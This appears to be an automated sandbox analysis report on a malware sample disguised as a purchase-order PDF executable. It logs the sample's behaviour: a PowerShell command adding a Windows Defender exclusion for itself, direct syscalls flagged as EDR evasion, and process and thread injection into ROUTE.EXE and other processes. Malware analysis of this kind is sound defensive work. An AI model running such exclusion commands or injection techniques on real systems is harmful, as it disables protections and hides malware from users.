                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CCA6F mov eax, dword ptr fs:[00000030h]5_2_016CCA6F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CCA6F mov eax, dword ptr fs:[00000030h]5_2_016CCA6F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CCA6F mov eax, dword ptr fs:[00000030h]5_2_016CCA6F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0A5B mov eax, dword ptr fs:[00000030h]5_2_016A0A5B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0A5B mov eax, dword ptr fs:[00000030h]5_2_016A0A5B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696A50 mov eax, dword ptr fs:[00000030h]5_2_01696A50
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696A50 mov eax, dword ptr fs:[00000030h]5_2_01696A50
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696A50 mov eax, dword ptr fs:[00000030h]5_2_01696A50
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696A50 mov eax, dword ptr fs:[00000030h]5_2_01696A50
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696A50 mov eax, dword ptr fs:[00000030h]5_2_01696A50
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696A50 mov eax, dword ptr fs:[00000030h]5_2_01696A50
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696A50 mov eax, dword ptr fs:[00000030h]5_2_01696A50
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BEA2E mov eax, dword ptr fs:[00000030h]5_2_016BEA2E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CCA24 mov eax, dword ptr fs:[00000030h]5_2_016CCA24
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CCA38 mov eax, dword ptr fs:[00000030h]5_2_016CCA38
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B4A35 mov eax, dword ptr fs:[00000030h]5_2_016B4A35
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B4A35 mov eax, dword ptr fs:[00000030h]5_2_016B4A35
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171CA11 mov eax, dword ptr fs:[00000030h]5_2_0171CA11
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CAAEE mov eax, dword ptr fs:[00000030h]5_2_016CAAEE
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CAAEE mov eax, dword ptr fs:[00000030h]5_2_016CAAEE
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E6ACC mov eax, dword ptr fs:[00000030h]5_2_016E6ACC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E6ACC mov eax, dword ptr fs:[00000030h]5_2_016E6ACC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E6ACC mov eax, dword ptr fs:[00000030h]5_2_016E6ACC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690AD0 mov eax, dword ptr fs:[00000030h]5_2_01690AD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C4AD0 mov eax, dword ptr fs:[00000030h]5_2_016C4AD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C4AD0 mov eax, dword ptr fs:[00000030h]5_2_016C4AD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698AA0 mov eax, dword ptr fs:[00000030h]5_2_01698AA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698AA0 mov eax, dword ptr fs:[00000030h]5_2_01698AA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E6AA4 mov eax, dword ptr fs:[00000030h]5_2_016E6AA4
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169EA80 mov eax, dword ptr fs:[00000030h]5_2_0169EA80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764A80 mov eax, dword ptr fs:[00000030h]5_2_01764A80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8A90 mov edx, dword ptr fs:[00000030h]5_2_016C8A90
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01728D6B mov eax, dword ptr fs:[00000030h]5_2_01728D6B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690D59 mov eax, dword ptr fs:[00000030h]5_2_01690D59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690D59 mov eax, dword ptr fs:[00000030h]5_2_01690D59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690D59 mov eax, dword ptr fs:[00000030h]5_2_01690D59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698D59 mov eax, dword ptr fs:[00000030h]5_2_01698D59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698D59 mov eax, dword ptr fs:[00000030h]5_2_01698D59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698D59 mov eax, dword ptr fs:[00000030h]5_2_01698D59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698D59 mov eax, dword ptr fs:[00000030h]5_2_01698D59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698D59 mov eax, dword ptr fs:[00000030h]5_2_01698D59
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01718D20 mov eax, dword ptr fs:[00000030h]5_2_01718D20
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01748D10 mov eax, dword ptr fs:[00000030h]5_2_01748D10
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01748D10 mov eax, dword ptr fs:[00000030h]5_2_01748D10
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AAD00 mov eax, dword ptr fs:[00000030h]5_2_016AAD00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AAD00 mov eax, dword ptr fs:[00000030h]5_2_016AAD00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AAD00 mov eax, dword ptr fs:[00000030h]5_2_016AAD00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C4D1D mov eax, dword ptr fs:[00000030h]5_2_016C4D1D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01686D10 mov eax, dword ptr fs:[00000030h]5_2_01686D10
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01686D10 mov eax, dword ptr fs:[00000030h]5_2_01686D10
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01686D10 mov eax, dword ptr fs:[00000030h]5_2_01686D10
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168CDEA mov eax, dword ptr fs:[00000030h]5_2_0168CDEA
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168CDEA mov eax, dword ptr fs:[00000030h]5_2_0168CDEA
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01730DF0 mov eax, dword ptr fs:[00000030h]5_2_01730DF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01730DF0 mov eax, dword ptr fs:[00000030h]5_2_01730DF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169ADE0 mov eax, dword ptr fs:[00000030h]5_2_0169ADE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169ADE0 mov eax, dword ptr fs:[00000030h]5_2_0169ADE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169ADE0 mov eax, dword ptr fs:[00000030h]5_2_0169ADE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169ADE0 mov eax, dword ptr fs:[00000030h]5_2_0169ADE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169ADE0 mov eax, dword ptr fs:[00000030h]5_2_0169ADE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169ADE0 mov eax, dword ptr fs:[00000030h]5_2_0169ADE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B0DE1 mov eax, dword ptr fs:[00000030h]5_2_016B0DE1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BCDF0 mov eax, dword ptr fs:[00000030h]5_2_016BCDF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BCDF0 mov ecx, dword ptr fs:[00000030h]5_2_016BCDF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01686DF6 mov eax, dword ptr fs:[00000030h]5_2_01686DF6
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"Jump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtClose: Direct from: 0x76EF2B6C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory written: C:\Users\user\Desktop\PO 2025918 pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: NULL target: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Users\user\Desktop\PO 2025918 pdf.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Users\user\Desktop\PO 2025918 pdf.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\ROUTE.EXEThread register set: target process: 6468Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\ROUTE.EXEThread APC queued: target process: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess created: C:\Users\user\Desktop\PO 2025918 pdf.exe "C:\Users\user\Desktop\PO 2025918 pdf.exe"Jump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: mIrIhAjAJblou.exe, 00000007.00000000.2375733559.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896277747.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000000.2526808133.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: mIrIhAjAJblou.exe, 00000007.00000000.2375733559.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896277747.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000000.2526808133.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: mIrIhAjAJblou.exe, 00000007.00000000.2375733559.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896277747.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000000.2526808133.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: mIrIhAjAJblou.exe, 00000007.00000000.2375733559.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896277747.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000000.2526808133.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeQueries volume information: C:\Users\user\Desktop\PO 2025918 pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
